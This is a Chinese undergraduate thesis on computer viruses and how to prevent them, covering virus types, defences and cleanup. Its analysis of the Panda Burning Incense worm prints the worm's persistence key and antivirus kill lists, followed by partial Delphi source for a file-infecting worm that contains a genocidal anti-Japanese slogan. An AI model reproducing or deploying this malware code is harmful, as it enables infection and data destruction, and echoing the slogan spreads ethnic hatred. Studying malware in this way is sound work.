計(jì)算機(jī)畢業(yè)設(shè)計(jì)---計(jì)算機(jī)病毒的研究與防治

1、<p><b>　　畢業(yè)論文</b></p><p>　　題目 計(jì)算機(jī)病毒的研究與防治 </p><p>　　教 學(xué) 系 信息工程系 </p><p>　　專業(yè)班級(jí) 計(jì)算機(jī)應(yīng)用10級(jí)3班 </p><p>　　學(xué)生姓名 *** </p>

2、;<p>　　學(xué)生學(xué)號(hào) 20102010183 </p><p>　　指導(dǎo)教師 *** </p><p>　　2012 年11 月 19 日</p><p><b>　　目 錄</b></p><p><b>　　摘要</b><

3、/p><p>　　目前計(jì)算機(jī)的應(yīng)用遍及到社會(huì)的各個(gè)領(lǐng)域，同時(shí)計(jì)算機(jī)病毒也給我們帶來了巨大的破壞和潛在的威脅。隨著計(jì)算機(jī)在社會(huì)生活各個(gè)領(lǐng)域的廣泛運(yùn)用，計(jì)算機(jī)病毒攻擊與防范技術(shù)也在不斷拓展。據(jù)報(bào)道，世界各國遭受計(jì)算機(jī)病毒感染和攻擊的事件數(shù)以億計(jì)，嚴(yán)重地干擾了正常的人類社會(huì)生活，給計(jì)算機(jī)網(wǎng)絡(luò)和系統(tǒng)帶來了巨大的潛在威脅和破壞。與此同時(shí)，病毒技術(shù)在戰(zhàn)爭(zhēng)領(lǐng)域也曾廣泛的運(yùn)用，在海灣戰(zhàn)爭(zhēng)、近期的科索沃戰(zhàn)爭(zhēng)中，雙方都曾利用計(jì)算機(jī)病毒向

4、敵方發(fā)起攻擊，破壞對(duì)方的計(jì)算機(jī)網(wǎng)絡(luò)和武器控制系統(tǒng)，達(dá)到了一定的政治目的與軍事目的。可以預(yù)見，隨著計(jì)算機(jī)、網(wǎng)絡(luò)運(yùn)用的不斷普及、深入，防范計(jì)算機(jī)病毒將越來越受到各國的高度重視。分析了計(jì)算機(jī)病毒的特點(diǎn)，討論了主要從及時(shí)清除計(jì)算機(jī)病毒、局域網(wǎng)病毒的防范、加強(qiáng)計(jì)算機(jī)網(wǎng)絡(luò)管理、個(gè)人用戶的防范，這幾個(gè)方面去進(jìn)行計(jì)算機(jī)病毒的有效防范。</p><p>　　關(guān)鍵詞:計(jì)算機(jī)病毒 防范</p><p><

5、b>　　Abstract</b></p><p>　　Computer virus and PreventionThe application of computer in every field of the society, along with the computer in the social life each domain's widespread utilization,

6、 the computer virus attack and its prevention technology also is in extend ceaselessly. According to the report, the world suffer the computer virus infection and the attack event hundreds of millions, seriously disturb

7、the normal life of human society, to computer networks and systems have brought tremendous potential threat and </p><p>　　Key words: computer virus prevention

8、 </p><p><b>　　1 引言</b></p><p>　　隨著計(jì)算機(jī)在社會(huì)生活各個(gè)領(lǐng)域的廣泛應(yīng)用，計(jì)算機(jī)病毒攻擊給我們的日常生活和工作中帶來了很多的威脅，對(duì)于大多數(shù)計(jì)算機(jī)用戶來說，談到“計(jì)算機(jī)病毒”似乎覺得它深不可測(cè)，無法琢磨，其實(shí)計(jì)

9、算機(jī)病毒是可以預(yù)防的，為了確保計(jì)算機(jī)使用的安全性，對(duì)計(jì)算機(jī)進(jìn)行防范措施是很重要的，本文對(duì)此問題進(jìn)行了探討。</p><p><b>　　2 正文</b></p><p>　　2．1計(jì)算機(jī)病毒的概述</p><p>　　隨著社會(huì)的不斷進(jìn)步，科學(xué)的不斷發(fā)展，計(jì)算機(jī)病毒的種類也越來越多，但終究萬變不離其宗！</p><p>　

10、　2.1.1計(jì)算機(jī)病毒的定義</p><p>　　一般來講，凡是能夠引起計(jì)算機(jī)故障，能夠破壞計(jì)算機(jī)中的資源（包括硬件和軟件）的代碼，統(tǒng)稱為計(jì)算機(jī)病毒。而在我國也通過條例的形式給計(jì)算機(jī)病毒下了一個(gè)具有法律性、權(quán)威性的定義：“計(jì)算機(jī)病毒，是指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者毀壞數(shù)據(jù)，影響計(jì)算機(jī)使用，并能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼?！?</p><p>　　2.1.2計(jì)算

11、機(jī)病毒的特性</p><p>　　1、隱藏性與潛伏性 </p><p>　　計(jì)算機(jī)病毒是一種具有很高編程技巧、短精悍的可執(zhí)行程序。它通常內(nèi)附在正常的程序中，用戶啟動(dòng)程序同時(shí)也打開了病毒程序。計(jì)算機(jī)病毒程序經(jīng)運(yùn)行取得系統(tǒng)控制權(quán)， 可以在不到1秒鐘的時(shí)間里傳染幾百個(gè)程序。而且在傳染操作成后，計(jì)算機(jī)系統(tǒng)仍能運(yùn)行，被感染的程序仍能執(zhí)行，這就是計(jì)機(jī)病毒傳染的隱蔽性……計(jì)算機(jī)病毒的潛伏性則是指，某些

12、編制巧的計(jì)算機(jī)病毒程序，進(jìn)入系統(tǒng)之后可以在幾周或者幾個(gè)月甚至年內(nèi)隱藏在合法文件中，對(duì)其它系統(tǒng)文件進(jìn)行傳染，而不被人發(fā)現(xiàn)。</p><p><b>　　2、傳染性 </b></p><p>　　計(jì)算機(jī)病毒可通過各種渠道(磁盤、共享目錄、郵件)從已被感染的計(jì)算機(jī)擴(kuò)散到其他機(jī)器上，感染其它用戶．在某情況下導(dǎo)致計(jì)算機(jī)工作失常。</p><p><

13、;b>　　3、表現(xiàn)性和破壞性</b></p><p>　　任何計(jì)算機(jī)病毒都會(huì)對(duì)機(jī)器產(chǎn)生一定程的影響，輕者占用系統(tǒng)資源，導(dǎo)致系統(tǒng)運(yùn)行速度大幅降低．重者除文件和數(shù)據(jù)，導(dǎo)致系統(tǒng)崩潰。</p><p>　　4、可觸發(fā)性病毒 </p><p>　　具有預(yù)定的觸發(fā)條件，可能是時(shí)間、日期、文類型或某些特定數(shù)據(jù)等。一旦滿足觸發(fā)條件，便啟動(dòng)感染或破壞作，使病毒進(jìn)行

14、感染或攻擊；如不滿足，繼續(xù)潛伏。有些病毒針對(duì)特定的操作系統(tǒng)或特定的計(jì)算機(jī)。</p><p><b>　　5、欺騙性和持久性</b></p><p>　　計(jì)算機(jī)病毒行動(dòng)詭秘，計(jì)算機(jī)對(duì)其反應(yīng)遲，往往把病毒造成的錯(cuò)誤當(dāng)成事實(shí)接受下來。病毒程序即使被發(fā)，已被破壞的數(shù)據(jù)和程序以及操作系統(tǒng)都難以恢復(fù)。在網(wǎng)絡(luò)操作情況下，由于病毒程序由一個(gè)受感染的拷貝通過網(wǎng)絡(luò)系統(tǒng)反復(fù)傳，病毒程序的清

15、除愈加復(fù)雜。</p><p>　　除了上述五點(diǎn)外，計(jì)算機(jī)病毒還具有不可預(yù)見性、衍生性、針對(duì)性、等特點(diǎn)。正是由于計(jì)算機(jī)病毒具有這些特點(diǎn)，給計(jì)算機(jī)病毒的預(yù)防、檢測(cè)與清除工作帶來了很大的難度。 </p><p>　　2.2計(jì)算機(jī)病毒的分類</p><p>　　2.2.1計(jì)算機(jī)病毒的基本分類</p><p>　　1、傳統(tǒng)開機(jī)型計(jì)算機(jī)病毒</p&

16、gt;<p>　　純粹的開機(jī)型計(jì)算機(jī)病毒多利用軟盤開機(jī)時(shí)侵入計(jì)算機(jī)系統(tǒng)，然后再伺機(jī)感染其他的軟盤或者硬盤，例如：“Stoned 3”（米開朗基羅）。</p><p>　　2、隱形開機(jī)型計(jì)算機(jī)病毒</p><p>　　此類計(jì)算機(jī)病毒感染的系統(tǒng)，再行檢查開機(jī)區(qū)，得到的將是正常的磁區(qū)資料，就好像沒有中毒一樣，此類計(jì)算機(jī)病毒不容易被殺毒軟件所查殺，而防毒軟件對(duì)于未知的此類型計(jì)算機(jī)病毒

17、，必須具有辨認(rèn)磁區(qū)資料真?zhèn)蔚哪芰?。此類?jì)算機(jī)病毒已出現(xiàn)的尚有“Fish”.</p><p>　　3、檔案感染型兼開機(jī)型計(jì)算機(jī)病毒</p><p>　　檔案感染型兼開機(jī)型計(jì)算機(jī)病毒時(shí)利用檔案感染時(shí)司機(jī)感染開機(jī)區(qū)，因而具有雙中的行動(dòng)能力，此類型較著名的計(jì)算機(jī)病毒有“Cancer”。</p><p>　　4、目錄型計(jì)算機(jī)病毒</p><p>　　本

18、類型計(jì)算機(jī)病毒的感染方式非常獨(dú)特，“Dir2”即其代表，此類計(jì)算機(jī)病毒僅修改目錄區(qū)（Root），便可達(dá)到其感染目的。</p><p>　　5、傳統(tǒng)檔案型計(jì)算機(jī)病毒</p><p>　　傳統(tǒng)檔案型計(jì)算機(jī)病毒最大的特征，便是將計(jì)算機(jī)病毒本身植入檔案，使檔案膨脹，以達(dá)到散播傳染的目的。代表有“13 Firday”。</p><p>　　6、千面人計(jì)算機(jī)病毒</p&g

19、t;<p>　　千面人計(jì)算機(jī)病毒是指具有自我編碼能力的計(jì)算機(jī)病毒，“1701 下雨”等，為這種類型主要代表，此種計(jì)算機(jī)病毒編碼的目的，是使其感染的每一個(gè)檔案，看起來皆不一樣，干擾殺毒軟件的偵測(cè)，不過千面人計(jì)算機(jī)病毒仍會(huì)留下的這個(gè)“小辮子”，將其繩之以法。</p><p><b>　　7、突變引擎病毒</b></p><p>　　有鑒于前面人計(jì)算機(jī)病毒一個(gè)

20、接一個(gè)被截獲，邊有人編寫出一種突變式計(jì)算機(jī)病毒，使原本千面人計(jì)算機(jī)病毒無法解決的程序開頭相同的問題得到克服，并編寫成OBJ副程序，供他人植草此類計(jì)算機(jī)病毒，即 Mctation engine。盡管如此，這類計(jì)算機(jī)病毒僅干擾了掃毒式軟件，對(duì)其他方式的防毒軟件并沒有太大的影響。</p><p>　　8、隱形檔案型計(jì)算機(jī)病毒</p><p>　　此類病毒可以避開去多防毒軟件，因?yàn)殡[形計(jì)算機(jī)病毒能

21、直接植入DOS系統(tǒng)的作業(yè)環(huán)境中，當(dāng)外部程序呼叫DOS中斷服務(wù)時(shí)，便同時(shí)執(zhí)行到計(jì)算機(jī)病毒本身，使得計(jì)算機(jī)病毒能從容地將受其感染的檔案，粉飾成正常無毒的樣子。此類計(jì)算機(jī)病毒有“4096” 等。</p><p>　　9、終結(jié)型計(jì)算機(jī)病毒</p><p>　　終結(jié)性計(jì)算機(jī)病毒能追蹤磁盤操作終端的原始進(jìn)入點(diǎn)，當(dāng)計(jì)算機(jī)病毒取得磁盤原始中斷時(shí)，便可任意再磁盤上修改資料或普哦壞資料，而不會(huì)驚動(dòng)防毒程序，這

22、就是說，裝有防毒程序和美妝防毒程序的情況是一樣的危險(xiǎn)。這類計(jì)算機(jī)病毒有的采用INT 1單步執(zhí)行的方式，逐步追蹤磁盤中斷的過程，找出BIOS磁盤中斷的部分，供計(jì)算機(jī)病毒內(nèi)部使用；有的采用死機(jī)的方式，記錄幾個(gè)BIOS版本的磁盤中斷原始進(jìn)入點(diǎn)，當(dāng)計(jì)算機(jī)病毒遭到熟悉的BIOS版本，便可直接呼叫磁盤中斷，對(duì)磁盤予取予求；有的則分析磁盤中斷的程序片段，找出BIOS中的相似部分便可直接呼叫磁盤中斷。其代表有“Hammer 6”等。</p>

23、<p>　　10、Word巨集計(jì)算機(jī)病毒</p><p>　　Word 巨集計(jì)算機(jī)病毒可以說時(shí)目前最新的計(jì)算機(jī)病毒種類了，它是文件型計(jì)算機(jī)病毒，異于以往以感染磁盤區(qū)或可執(zhí)行的檔案為主的計(jì)算機(jī)病毒，此類病毒時(shí)利用Word 提供的巨集功能來感染文件。目前已經(jīng)在Internet及BBS網(wǎng)絡(luò)中發(fā)現(xiàn)不少Word巨集計(jì)算機(jī)病毒，而且此類計(jì)算機(jī)病毒是用類似Basic程序編寫出來的，易學(xué)，其反戰(zhàn)速度一定很快。<

24、;/p><p>　　2.3計(jì)算機(jī)病毒防范和清除的基本原則和技術(shù)</p><p>　　2.3.1計(jì)算機(jī)病毒防范的概念和原則</p><p>　　計(jì)算機(jī)病毒防范，是指通過建立合理的計(jì)算機(jī)病毒防范體系和制度，即使發(fā)現(xiàn)計(jì)算機(jī)病毒入侵，并采取有效的手段阻止計(jì)算機(jī)病毒的傳播和破壞，回復(fù)受影響的計(jì)算機(jī)系統(tǒng)和數(shù)據(jù)。</p><p>　　原則以防御計(jì)算機(jī)病毒為主動(dòng)

25、，主要表現(xiàn)在檢測(cè)行為的動(dòng)態(tài)性和防范方法的廣譜性。</p><p>　　2.3.2計(jì)算機(jī)病毒防范基本技術(shù)</p><p>　　計(jì)算機(jī)病毒預(yù)防是在計(jì)算機(jī)病毒尚未入侵或剛剛?cè)肭?，就攔截、阻擊計(jì)算機(jī)病毒的入侵或立即警報(bào)。目前在預(yù)防計(jì)算機(jī)病毒工具中采用的主要技術(shù)如下：</p><p>　　1 經(jīng)常從軟件供應(yīng)商那邊下載、安裝安全補(bǔ)丁程序和升級(jí)殺毒軟件。</p>&

26、lt;p>　　2 新購置的計(jì)算機(jī)和新安裝的系統(tǒng)，一定要進(jìn)行系統(tǒng)升級(jí)，保證修補(bǔ)所有已知的安全漏洞。</p><p>　　3 使用高強(qiáng)度的口令。</p><p>　　4 經(jīng)常備份重要數(shù)據(jù)。特別是要做到經(jīng)常性地對(duì)不易復(fù)得數(shù)據(jù)（個(gè)人文檔、程序源代碼等等）完全備份。</p><p>　　5 選擇并安裝經(jīng)過公安部認(rèn)證的防病毒軟件，定期對(duì)整個(gè)硬盤進(jìn)行病毒檢測(cè)、清除工作。&l

27、t;/p><p>　　6 安裝防火墻（軟件防火墻），提高系統(tǒng)的安全性。</p><p>　　7 當(dāng)計(jì)算機(jī)不使用時(shí)，不要接入互聯(lián)網(wǎng)，一定要斷掉連接。</p><p>　　8 不要打開陌生人發(fā)來的電子郵件，無論它們有多么誘人的標(biāo)題或者附件。同時(shí)也要小心處理來自于熟人的郵件附件。</p><p>　　9 正確配置、使用病毒防治產(chǎn)品。</p>

28、;<p>　　10 正確配置計(jì)算機(jī)系統(tǒng)，減少病毒侵害事件。充分利用系統(tǒng)提供的安全機(jī)制，提高系統(tǒng)防范病毒的能力。</p><p>　　2.3.3清除計(jì)算機(jī)病毒的基本方法</p><p><b>　　1.簡(jiǎn)單的工具治療</b></p><p>　　簡(jiǎn)單工具治療是指使用Debug等簡(jiǎn)單的工具，借助檢測(cè)者對(duì)某種計(jì)算機(jī)病毒的具體知識(shí)，從感染

29、計(jì)算機(jī)病毒的軟件中摘除計(jì)算機(jī)代碼。但是，這種方法同樣對(duì)檢測(cè)者自身的專業(yè)素質(zhì)要求較高，而且治療效率也較低。</p><p><b>　　2.專用工具治療</b></p><p>　　使用專用工具治療被感染的程序時(shí)通常使用的治療方法。專用計(jì)算機(jī)治療工具，根據(jù)對(duì)計(jì)算機(jī)病毒特征的記錄，自動(dòng)清除感染程序中的計(jì)算機(jī)病毒代碼，使之得以恢復(fù)。使用專用工具治療計(jì)算機(jī)病毒時(shí)，治療操作簡(jiǎn)單

30、、高效。從探索與計(jì)算機(jī)病毒對(duì)剛的全過程來看，專用工具的開發(fā)商也是先從使用簡(jiǎn)單工具進(jìn)行治療開始，當(dāng)治療獲得成功后，再研制相應(yīng)的軟件產(chǎn)品，使計(jì)算機(jī)自動(dòng)地完成全部治療操作。</p><p>　　2.4 典型計(jì)算機(jī)病毒的原理、防范和清除</p><p>　　2.4.1引導(dǎo)區(qū)計(jì)算機(jī)病毒</p><p>　　系統(tǒng)引導(dǎo)區(qū)時(shí)在系統(tǒng)引導(dǎo)的時(shí)候，進(jìn)入到系統(tǒng)中，獲得對(duì)系統(tǒng)的控制權(quán)，在完成

31、其自身的安裝后才去引導(dǎo)系統(tǒng)的。稱其為引導(dǎo)區(qū)計(jì)算機(jī)病毒時(shí)因?yàn)檫@類計(jì)算機(jī)病毒一般是都侵占系統(tǒng)硬盤的主引導(dǎo)扇區(qū)I/O分區(qū)的引導(dǎo)扇區(qū)，對(duì)于軟盤則侵占了軟盤的引導(dǎo)扇區(qū)。</p><p>　　它會(huì)感染在該系統(tǒng)中進(jìn)行讀寫操作的所有軟盤，然后再由這些軟盤以復(fù)制的方式和引導(dǎo)進(jìn)入到其他計(jì)算機(jī)系統(tǒng)，感染其他計(jì)算機(jī)的操作系統(tǒng)。</p><p><b>　　如何檢測(cè)呢？</b></p&g

32、t;<p>　　查看系統(tǒng)內(nèi)存的總量與正常情況進(jìn)行比較</p><p>　　檢查系統(tǒng)內(nèi)存高端的內(nèi)容</p><p>　　檢查系統(tǒng)的INT 13H中斷向量</p><p>　　檢查硬盤的主引導(dǎo)扇區(qū)、DOS分區(qū)引導(dǎo)扇區(qū)以及軟盤的引導(dǎo)扇區(qū)</p><p><b>　　清除：</b></p><p

33、>　　用原來正常的分區(qū)表信息或引導(dǎo)扇區(qū)信息，覆蓋掉計(jì)算機(jī)病毒程序。此時(shí)，如果用戶事先提取并保存了自己硬盤中分區(qū)表的信息和DOS分區(qū)引導(dǎo)扇區(qū)信息，那么，恢復(fù)工作變得非常簡(jiǎn)單?？梢灾苯佑肈ebug將這兩種引導(dǎo)扇區(qū)的內(nèi)容分別調(diào)入內(nèi)存，然后分別回它的原來位置，這樣就消除了計(jì)算機(jī)病毒。</p><p>　　2.4.2文件型計(jì)算機(jī)病毒</p><p>　　文件型計(jì)算機(jī)病毒程序都是依附在系統(tǒng)可執(zhí)行

34、文件或覆蓋文件上，當(dāng)文件裝入系統(tǒng)執(zhí)行的時(shí)候，引導(dǎo)計(jì)算機(jī)病毒程序也進(jìn)入到系統(tǒng)中。只有極少計(jì)算機(jī)病毒程序感染數(shù)據(jù)文件。</p><p>　　此類病毒感染對(duì)象大多是系統(tǒng)的可執(zhí)行文件，也有一些還要對(duì)覆蓋文件進(jìn)行傳染，而對(duì)數(shù)據(jù)進(jìn)行傳染的則少見。</p><p><b>　　清除：</b></p><p>　　確定計(jì)算機(jī)病毒程序的位置，是駐留在文件尾部還是

35、在文件首部。</p><p>　　找到計(jì)算機(jī)病毒程序的首部位置（對(duì)應(yīng)于在文件尾部駐留方式），或者尾部位置（對(duì)應(yīng)于在文件首部駐留方式）。</p><p>　　恢復(fù)原文件頭部的參數(shù)。</p><p>　　2.4.3腳本型計(jì)算機(jī)病毒</p><p>　　主要采用腳本語言設(shè)計(jì)的病毒稱其為腳本病毒。實(shí)際上在早期的系統(tǒng)中，計(jì)算機(jī)病毒就已經(jīng)開始利用腳本進(jìn)行

36、傳播和破壞，不過專門的腳本病毒并不常見。但是在腳本應(yīng)用無所不在的今天，腳本病毒卻成為危害最大，最為廣泛的病毒，特別是當(dāng)他和一些傳統(tǒng)的惡性病毒相結(jié)合時(shí)，其危害就更為嚴(yán)重了。</p><p>　　其主要有兩種類型，純腳本型，混合型。</p><p><b>　　它的特點(diǎn)：</b></p><p><b>　　編寫簡(jiǎn)單</b>&

37、lt;/p><p><b>　　破壞力大</b></p><p><b>　　感染力強(qiáng)</b></p><p>　　傳播范圍大（多通過E-mail，局域網(wǎng)共享，感染網(wǎng)頁文件的方式傳播）</p><p>　　計(jì)算機(jī)病毒源碼容易被獲取，變種多</p><p><b>　　欺

38、騙性強(qiáng)</b></p><p>　　使得計(jì)算機(jī)病毒生產(chǎn)機(jī)事先起來非常容易</p><p><b>　　清除：</b></p><p>　　禁用文件系統(tǒng)對(duì)象FileSystemObject</p><p>　　卸載Windows Scripting Host</p><p>　　刪除vb

39、s，vbe，js，jse文件后綴與應(yīng)用程序映射</p><p>　　在Windows目錄中，找到WScript.exe，更改名稱或者刪除</p><p>　　要徹底防止vbs網(wǎng)絡(luò)蠕蟲病毒，還需要設(shè)置一下瀏覽器</p><p>　　禁止OE的自動(dòng)收發(fā)電子郵件功能</p><p>　　顯示所有文件類型的擴(kuò)展名稱</p><p&

40、gt;　　將系統(tǒng)的網(wǎng)絡(luò)連接的安全級(jí)別設(shè)置至少為“中等”</p><p>　　2.4.4特洛伊木馬計(jì)算機(jī)病毒</p><p>　　特洛伊木馬也叫黑客程序或后門病毒，是指吟唱在正常程序中的一段具有特殊功能的程序，其隱蔽性及好，不易察覺，是一種極為危險(xiǎn)的網(wǎng)絡(luò)攻擊手段。</p><p>　　其第一代：偽裝性病毒，第二代：AIDS型木馬，第三代：網(wǎng)絡(luò)傳播性木馬</p&g

41、t;<p><b>　　如何檢查？</b></p><p><b>　　稽查注冊(cè)表</b></p><p>　　檢查你的系統(tǒng)配置文件</p><p><b>　　清除：</b></p><p><b>　　備份重要數(shù)據(jù)</b></p&g

42、t;<p><b>　　立即關(guān)閉身背電源</b></p><p><b>　　備份木馬入侵現(xiàn)場(chǎng)</b></p><p><b>　　修復(fù)木馬危害</b></p><p>　　2.4.5 蠕蟲計(jì)算機(jī)病毒</p><p>　　蠕蟲是一種通過網(wǎng)絡(luò)傳播的惡性計(jì)算機(jī)病毒，它

43、具有計(jì)算機(jī)病毒的一些共性，如傳播性、隱蔽性、破壞性等。同時(shí)自己有自己一些特征，如利用文件寄生，對(duì)網(wǎng)絡(luò)造成拒絕服務(wù)以及和黑客技術(shù)相結(jié)合等。</p><p>　　簡(jiǎn)單點(diǎn)說，蠕蟲就是使用危害的代碼來攻擊網(wǎng)絡(luò)上的受害主機(jī)，并在受害主機(jī)上自我復(fù)制，再攻擊其他的受害主機(jī)的計(jì)算機(jī)病毒。</p><p><b>　　其特征：</b></p><p><b

44、>　　自我繁殖</b></p><p><b>　　利用軟件漏洞</b></p><p><b>　　造成網(wǎng)絡(luò)擁堵</b></p><p><b>　　消耗系統(tǒng)資源</b></p><p><b>　　留下安全隱患</b></p&g

45、t;<p><b>　　清除：</b></p><p><b>　　與防火墻互動(dòng)</b></p><p><b>　　交換機(jī)聯(lián)動(dòng)</b></p><p>　　通知HIDS（基于主機(jī)的入侵檢測(cè)）</p><p><b>　　報(bào)警</b><

46、/p><p>　　2.5 “熊貓燒香”病毒剖析</p><p>　　“熊貓燒香”病毒感染機(jī)理:“熊貓燒香”，是一個(gè)感染型的蠕蟲病毒，它能感染系統(tǒng)中exe，com，pif，src，html，asp等文件，它還能中止大量的反病毒軟件進(jìn)程并且會(huì)刪除擴(kuò)展名為gho的文件，該文件是一系統(tǒng)備份工具GHOST的備份文件，使用戶的系統(tǒng)備份文件丟失。被感染的用戶系統(tǒng)中所有.exe可執(zhí)行文件全部被改成熊貓舉著三根

47、香的模樣。</p><p>　　1:拷貝文件病毒運(yùn)行后,會(huì)把自己拷貝到C:\WINDOWS\System32\Drivers\spoclsv.exe</p><p>　　2:添加注冊(cè)表自啟動(dòng)病毒會(huì)添加自啟動(dòng)項(xiàng)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\Sy

48、stem32\Drivers\spoclsv.exe </p><p><b>　　3:病毒行為</b></p><p>　　a:每隔1秒尋找桌面窗口,并關(guān)閉窗口標(biāo)題中含有以下字符的程序： </p><p>　　QQKav、QQAV、防火墻、進(jìn)程、VirusScan、網(wǎng)鏢、殺毒、毒霸、瑞星、江民、黃山IE、超級(jí)兔子、優(yōu)化大師、木馬克星、木馬清道

49、夫、QQ病毒、注冊(cè)表編輯器、系統(tǒng)配置實(shí)用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、綠鷹PC、密碼防盜、噬菌體、木馬輔助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戲木馬檢測(cè)大師、msctls_statusbar32、pjf(ustc)、IceSword，并使用的鍵盤映射的方法關(guān)閉安全軟件IceSword

50、。添加注冊(cè)表使自己自啟動(dòng)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe并中止系統(tǒng)中以下的進(jìn)程: </p><p>　　Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、T

51、BMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl

52、132.exe。</p><p>　　b:每隔18秒點(diǎn)擊病毒作者指定的網(wǎng)頁,并用命令行檢查系統(tǒng)中是否存在共享，共存在的話就運(yùn)行net share命令關(guān)閉admin$共享。</p><p>　　c:每隔10秒下載病毒作者指定的文件,并用命令行檢查系統(tǒng)中是否存在共享，共存在的話就運(yùn)行net share命令關(guān)閉admin$共享。</p><p>　　d:每隔6秒刪除安全軟

53、件在注冊(cè)表中的鍵值。</p><p>　　并修改以下值不顯示隱藏文件 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue -> 0x00 </p><p>　　刪除以下服務(wù): navapsvc、wscsvc、K

54、PfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc。</p><p><b>　　e:感染文件 </b></p><p>　　病毒會(huì)感染擴(kuò)展名為exe,pif,com,src的文件,把自己附加到文件的頭部，并在擴(kuò)展名為htm,htm

55、l, asp,php,jsp,aspx的文件中添加一網(wǎng)址，用戶一但打開了該文件，IE就會(huì)不斷的在后臺(tái)點(diǎn)擊寫入的網(wǎng)址，達(dá)到增加點(diǎn)擊量的目的,但病毒不會(huì)感染以下文件夾名中的文件： </p><p>　　WINDOW、Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Express

56、、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone 。</p><p><b>　　g:刪除文件 </b></p

57、><p>　　病毒會(huì)刪除擴(kuò)展名為gho的文件，該文件是一系統(tǒng)備份工具GHOST的備份文件使用戶的系統(tǒng)備份文件丟失。 </p><p>　　“熊貓燒香”病毒核心源碼</p><p>　　用 Delphi 寫</p><p>　　program Japussy;</p><p><b>　　uses</b>

58、;</p><p>　　Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};</p><p><b>　　const</b></p><p>　　HeaderSize = 82432; //病毒體的大小</p><p>　　IconOff

59、set = $12EB8; //PE文件主圖標(biāo)的偏移量</p><p>　　//在我的Delphi5 SP1上面編譯得到的大小，其它版本的Delphi可能不同</p><p>　　//查找2800000020的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量</p><p><b>　　{</b></p><p>

60、　　HeaderSize = 38912; //Upx壓縮過病毒體的大小</p><p>　　IconOffset = $92BC; //Upx壓縮過PE文件主圖標(biāo)的偏移量</p><p>　　//Upx 1.24W 用法: upx -9 --8086 Japussy.exe</p><p><b>　　}</b&

61、gt;</p><p>　　IconSize = $2E8; //PE文件主圖標(biāo)的大小--744字節(jié)</p><p>　　IconTail = IconOffset + IconSize; //PE文件主圖標(biāo)的尾部</p><p>　　ID = $44444444; //感染標(biāo)記</p>&

62、lt;p>　　//垃圾碼，以備寫入</p><p>　　Catchword = 'If a race need to be killed out, it must be Yamato. ' </p><p><b>　　+</b></p><p>　　'If a country need to be destroy

63、ed, it must be Japan! ' +</p><p>　　'*** W32.Japussy.Worm.A ***';</p><p>　　{$R *.RES}</p><p>　　Function RegisterServiceProcess()function RegisterServiceProcess(dwProcessI

64、D, dwType: Integer): </p><p><b>　　Integer; </b></p><p>　　stdcall; external 'Kernel32.dll'; //函數(shù)聲明</p><p><b>　　var</b></p><p>　　TmpFile:

65、string;</p><p>　　Si: STARTUPINFO;</p><p>　　Pi: PROCESS_INFORMATION;</p><p>　　IsJap: Boolean = False; //日文操作系統(tǒng)標(biāo)記</p><p>　　{ 判斷是否為Win9x }</p><p>

66、　　Function IsWin9x()function IsWin9x: Boolean;</p><p><b>　　var</b></p><p>　　Ver: TOSVersionInfo;</p><p><b>　　begin</b></p><p>　　Result := False;

67、</p><p>　　Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);</p><p>　　if not GetVersionEx(Ver) then</p><p><b>　　Exit;</b></p><p>　　if (Ver.dwPlatformID = VE

68、R_PLATFORM_WIN32_WINDOWS) then //Win9x</p><p>　　Result := True;</p><p><b>　　end;</b></p><p>　　{ 在流之間復(fù)制 }</p><p>　　procedure CopyStream(Src: TStream; sStartP

69、os: Integer; Dst: TStream;</p><p>　　dStartPos: Integer; Count: Integer);</p><p><b>　　var</b></p><p>　　sCurPos, dCurPos: Integer;</p><p><b>　　begin<

70、/b></p><p>　　sCurPos := Src.Position;</p><p>　　dCurPos := Dst.Position;</p><p>　　Src.Seek(sStartPos, 0);</p><p>　　Dst.Seek(dStartPos, 0);</p><p>　　Dst.C

71、opyFrom(Src, Count);</p><p>　　Src.Seek(sCurPos, 0);</p><p>　　Dst.Seek(dCurPos, 0);</p><p><b>　　end;</b></p><p>　　{ 將宿主文件從已感染的PE文件中分離出來，以備使用 }</p><

72、;p>　　procedure ExtractFile(FileName: string);</p><p><b>　　var</b></p><p>　　sStream, dStream: TFileStream;</p><p><b>　　begin</b></p><p><b&

73、gt;　　try</b></p><p>　　sStream := TFileStream.Create(ParamStr(0), fmOpenRead or </p><p>　　fmShareDenyNone);</p><p><b>　　try</b></p><p>　　dStream := TFi

74、leStream.Create(FileName, fmCreate);</p><p><b>　　try</b></p><p>　　sStream.Seek(HeaderSize, 0); //跳過頭部的病毒部分</p><p>　　dStream.CopyFrom(sStream, sStream.Size - HeaderSize);

75、</p><p><b>　　finally</b></p><p>　　dStream.Free;</p><p><b>　　end;</b></p><p><b>　　finally</b></p><p>　　sStream.Free;<

76、/p><p><b>　　end;</b></p><p><b>　　except</b></p><p><b>　　end;</b></p><p><b>　　end;</b></p><p>　　{ 填充STARTUPINFO

